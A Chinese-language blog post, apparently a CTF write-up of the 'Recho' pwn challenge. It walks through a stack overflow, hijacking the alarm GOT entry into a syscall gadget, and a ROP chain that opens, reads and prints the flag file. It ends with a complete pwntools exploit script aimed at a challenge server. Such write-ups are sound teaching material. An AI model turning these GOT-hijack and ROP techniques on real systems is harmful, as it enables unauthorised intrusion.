<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="先来看看文件机制：  Ida64 位查看 1234567891011121314151617181920int __cdecl main(int argc, const char **argv, const char **envp)&amp;#123;  char nptr[16]; &#x2F;&#x2F; [rsp+0h] [rbp-40h] BYREF  char buf[40]; &#x2F;&#x2F; [rsp+10h] [rbp-">
<meta property="og:type" content="article">
<meta property="og:title" content="Recho">
<meta property="og:url" content="http://example.com/2023/07/31/Recho/index.html">
<meta property="og:site_name" content="Dvgd">
<meta property="og:description" content="先来看看文件机制：  Ida64 位查看 1234567891011121314151617181920int __cdecl main(int argc, const char **argv, const char **envp)&amp;#123;  char nptr[16]; &#x2F;&#x2F; [rsp+0h] [rbp-40h] BYREF  char buf[40]; &#x2F;&#x2F; [rsp+10h] [rbp-">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/Recho/image-20230731125223546.png">
<meta property="og:image" content="http://example.com/images/Recho/image-20230731125610315.png">
<meta property="og:image" content="http://example.com/images/Recho/image-20230731125657760.png">
<meta property="og:image" content="http://example.com/images/Recho/image-20230731125900115.png">
<meta property="og:image" content="http://example.com/images/Recho/clip_image015.jpg">
<meta property="article:published_time" content="2023-07-31T02:37:18.000Z">
<meta property="article:modified_time" content="2023-07-31T07:18:26.847Z">
<meta property="article:author" content="Dvgd">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/Recho/image-20230731125223546.png">

<link rel="canonical" href="http://example.com/2023/07/31/Recho/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Recho | Dvgd</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Dvgd</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Dvgd</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签<span class="badge">2</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类<span class="badge">10</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档<span class="badge">53</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/07/31/Recho/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/Dvgd.jpg">
      <meta itemprop="name" content="Dvgd">
      <meta itemprop="description" content="Welcome to my blog.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Dvgd">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Recho
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-07-31 10:37:18 / 修改时间：15:18:26" itemprop="dateCreated datePublished" datetime="2023-07-31T10:37:18+08:00">2023-07-31</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>先来看看文件机制：</p>
<p><img src="/../images/Recho/image-20230731125223546.png" alt="image-20230731125223546"></p>
<p>Ida64 位查看</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">char</span> nptr[<span class="number">16</span>]; <span class="comment">// [rsp+0h] [rbp-40h] BYREF</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">40</span>]; <span class="comment">// [rsp+10h] [rbp-30h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v6; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line">  <span class="type">int</span> v7; <span class="comment">// [rsp+3Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">Init</span>(argc, argv, envp);</span><br><span class="line">  <span class="built_in">write</span>(<span class="number">1</span>, <span class="string">&quot;Welcome to Recho server!\n&quot;</span>, <span class="number">0x19</span>uLL);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="built_in">read</span>(<span class="number">0</span>, nptr, <span class="number">0x10</span>uLL) &gt; <span class="number">0</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    v7 = <span class="built_in">atoi</span>(nptr);</span><br><span class="line">    <span class="keyword">if</span> ( v7 &lt;= <span class="number">15</span> )</span><br><span class="line">      v7 = <span class="number">16</span>;</span><br><span class="line">    v6 = <span class="built_in">read</span>(<span class="number">0</span>, buf, v7);</span><br><span class="line">    buf[v6] = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>, buf);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p> 注意这个while循环，导致该程序一直运行，无法退出进程（read 返回值恒为正）… 刚开始很懵逼，只能去上网看看大佬们写的，发现了 shutdown 函数…. 退出循环主要是利用 pwntools 提供的一个功能：shutdown。这个功能可以关闭流，这样就可以 退出循环了。 </p>
<p> 网上有些大佬们都去找 flag 的时候 shift F12 一按就有了，而我…</p>
<p> <img src="/../images/Recho/image-20230731125610315.png" alt="image-20230731125610315"></p>
<p>flag  呢？我都怀疑是不是同一个题目…. </p>
<p>结果在导出表里（export)</p>
<p><img src="/../images/Recho/image-20230731125657760.png" alt="image-20230731125657760"></p>
<p> 好了又回到同一起点了</p>
<p> 这里面最重要的是实现 got 表劫持和 ROP 链的实现，利用 open()这一系统函数远程打开 flag 文件， 而不是夺取 shell 权限：</p>
<p> 为什么会想到这个呢，可能时看到了 flag 字段的出现，但没有 system 函数这一类，想到了远程打 开文件这样把..（就当作公式吧） </p>
<p>整体思路： 先把 alarm 的 got 表修改一下，改成 open（）打开 flag 文件，然后读取在 bss 段上，利用 printf 或 write 打在屏幕上（改 alarm 因为他没用。。）， </p>
<p>注：选 bss 段是因为 bss 段的可读可执行功能，bss 段可以自己去 ida 的页面上去搜，随便找 一段就好了（尽量长一点）。</p>
<p> 这里我们会发现一个知识点，这些 Libc.so 里的系统函数都有 syscall 这一调用这一函数，并且 eax 存放序列号。</p>
<p> gdb 调试，r 运行，再按 ctrl c 强行停止，在用 disass alarm看下反汇编</p>
<p> <img src="/../images/Recho/image-20230731125900115.png" alt="image-20230731125900115"></p>
<p> alarm 序列号为 0x25，并且我们可以看到 syscall 与起点 mov eax 的偏移量为 5。（这是 重点！） 然后我们要去找 open 的序列号</p>
<p>这里附上查找链接(68 条消息) Linux 系统调用表(system call table),然后 open 序列号你知道了，现在只需要完成 alarm got 表的修改，那怎么 改呢? 网上大佬们都很牛皮的说靠经验更改了一段这个….</p>
<p>alarm 序列号为 0x25，并且我们可以看到 syscall 与起点 mov eax 的偏移量为 5。（这是重点！）</p>
<p>然后我们要去找 open 的序列号</p>
<p>这里我是在网上搜的 Linux 系统调用库，因为我 gdb 调出来的不是 2，我也不清楚为什么..不知道其他兄弟们怎么样。附上查找链接<a target="_blank" rel="noopener" href="https://blog.csdn.net/Rong_Toa/article/details/109826240">(68 条消息) Linux 系统调用表(system</a> call table)_rtoax 的博客-CSDN 博客_系统调用表</p>
<p>然后 open 序列号你知道了，现在只需要完成 alarm got 表的修改，那怎么改呢?</p>
<p>用 ROPgadget 找了一下…..</p>
<p><img src="/../images/Recho/clip_image015.jpg" alt="img"></p>
<p>这一段的作用是吧 rdi 里的值作为地址，指向的数值加上 al 里的值。</p>
<p>所以我们可以把 alarm 的 got 表地址放在 rdi 里，然后把偏移量 5 放到 rax 里，我们就实现了把 alarma 的调用改成了 syscall 的调用。</p>
<p>好了最难的已经过去了，现在就是一大串的 ROP 链实现：</p>
<p> POPADD 即实现上图红线功能，劫持 got 表POPrax 把值弹到 rax 里，其他的以此类推。</p>
<p>注意特别的是 POPrsi 是 POP RSI,POP R15,所以后面加了两个 p64()。（ROPgadget 里只有这个兄弟们可以自己试试）</p>
<p>pay &#x3D; b’a’*0x38+ p64(POPrax)+p64(5)+p64(POPrdi)+p64(alarm_got)+p64(POPADD)</p>
<p>0x38 填充到返回地址，然后后把 5 弹到 RAX,alarm got 表弹到 RDI,后面接 POPADD 实现 GOT</p>
<p>表劫持</p>
<p>Pay   +&#x3D;   p64(POPrdi)+p64(flag)+p64(POPrsi)+p64(0)+p64(0)+   p64(POPrax)   +   p64(2)      +</p>
<p>p64(alarm_plt)  调用 open 函数(0,flag)</p>
<p>Pay +&#x3D; p64(POPrdi)+p64(3)+p64(POPrsi)+p64(bss)+p64(0)+p64(POPrdx)+p64(200)+p64(read_plt)</p>
<p>调用 read 函数（3,buf,200) 3 是默认的，200 为读取 200 字节</p>
<p>pay +&#x3D; p64(POPrdi)+p64(1)+p64(POPrsi)+p64(bss)+p64(0)+p64(POPrdx)+p64(200)+p64(write_plt)</p>
<p>调用 write 函数（1,buf,200）1 为默认值，200 为往屏幕上写 200 字节</p>
<p>至此 ROP 链构建完成，展示全部代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#p=process(&#x27;./f&#x27;)</span></span><br><span class="line">p=remote(<span class="string">&#x27;61.147.171.105&#x27;</span>,<span class="number">50861</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./f&#x27;</span>)</span><br><span class="line"></span><br><span class="line">bss=elf.bss()</span><br><span class="line">pop_rdi=<span class="number">0x4008a3</span></span><br><span class="line">pop_rsi_r15=<span class="number">0x4008a1</span></span><br><span class="line">pop_rdx=<span class="number">0x4006fe</span></span><br><span class="line">pop_rax=<span class="number">0x4006fc</span></span><br><span class="line">add_rdi_al=<span class="number">0x40070d</span></span><br><span class="line">flag=<span class="number">0x601058</span></span><br><span class="line"></span><br><span class="line">read_plt=elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">write_plt=elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">alarm_plt=elf.plt[<span class="string">&#x27;alarm&#x27;</span>]</span><br><span class="line">alarm_got=elf.got[<span class="string">&#x27;alarm&#x27;</span>]</span><br><span class="line"></span><br><span class="line">offset=<span class="number">0x38</span></span><br><span class="line">pay=<span class="string">b&#x27;a&#x27;</span>*offset+p64(pop_rax)+p64(<span class="number">5</span>)+p64(pop_rdi)+p64(alarm_got)+p64(add_rdi_al)</span><br><span class="line">pay+=p64(pop_rdi)+p64(flag)+p64(pop_rsi_r15)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(pop_rax)+p64(<span class="number">2</span>)+p64(alarm_plt)</span><br><span class="line">pay+=p64(pop_rdi)+p64(<span class="number">3</span>)+p64(pop_rsi_r15)+p64(bss)+p64(<span class="number">0</span>)+p64(pop_rdx)+p64(<span class="number">100</span>)+p64(read_plt)</span><br><span class="line">pay+=p64(pop_rdi)+p64(<span class="number">1</span>)+p64(pop_rsi_r15)+p64(bss)+p64(<span class="number">0</span>)+p64(pop_rdx)+p64(<span class="number">100</span>)+p64(write_plt)</span><br><span class="line">pay.ljust(<span class="number">0x200</span>,<span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">0x200</span>))</span><br><span class="line">p.sendline(pay)</span><br><span class="line">p.recv()</span><br><span class="line">p.shutdown(<span class="string">&#x27;send&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>#got change</p>
<p>pay   +&#x3D;   p64(POPrdi)+p64(flag)+p64(POPrsi)+p64(0)+p64(0)+   p64(POPrax)   +   p64(2)      +</p>
<p>p64(alarm_plt)    #open use</p>
<p>pay +&#x3D; p64(POPrdi)+p64(3)+p64(POPrsi)+p64(bss)+p64(0)+p64(POPrdx)+p64(200)+p64(read_plt) #read use</p>
<p>pay +&#x3D; p64(POPrdi)+p64(1)+p64(POPrsi)+p64(bss)+p64(0)+p64(POPrdx)+p64(200)+p64(write_plt)</p>
<p>p.recvuntil(“server!”)</p>
<p>p.sendline(str(0x200))  &#x2F;&#x2F;atoi()函数是将字符串变为数字，所以我们这里输一个大一点的满足溢出条件</p>
<p>pay.ljust(0x200,b’\0’)   &#x2F;&#x2F;补齐 payload p.sendline(pay)</p>
<p>p.recv()</p>
<p>p.shutdown(‘send’)     &#x2F;&#x2F;跳出循环p.interactive()</p>
<p>p.close()</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/07/31/%E5%AF%84%E5%AD%98%E5%99%A8/" rel="prev" title="assemb">
      <i class="fa fa-chevron-left"></i> assemb
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/07/31/heap2/" rel="next" title="note-service2">
      note-service2 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Dvgd"
      src="/images/Dvgd.jpg">
  <p class="site-author-name" itemprop="name">Dvgd</p>
  <div class="site-description" itemprop="description">Welcome to my blog.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">53</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yourname" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yourname" rel="noopener" target="_blank"><i class="github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/yourname" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;yourname" rel="noopener" target="_blank"><i class="weibo fa-fw"></i>Weibo</a>
      </span>
  </div>



      </div>
	   <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1861579836&auto=1&height=66"></iframe>
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Dvgd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


  <script async src="/js/cursor/fireworks.js"></script>


</body>
</html>
<!-- 引入jQuery -->
<script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
<!-- 雪花特效2 -->
<script type="text/javascript" src="/js/snow2.js"></script>

<!-- 樱花特效 -->
  
      <script async src="/js/fairyDustCursor.js"></script>
  


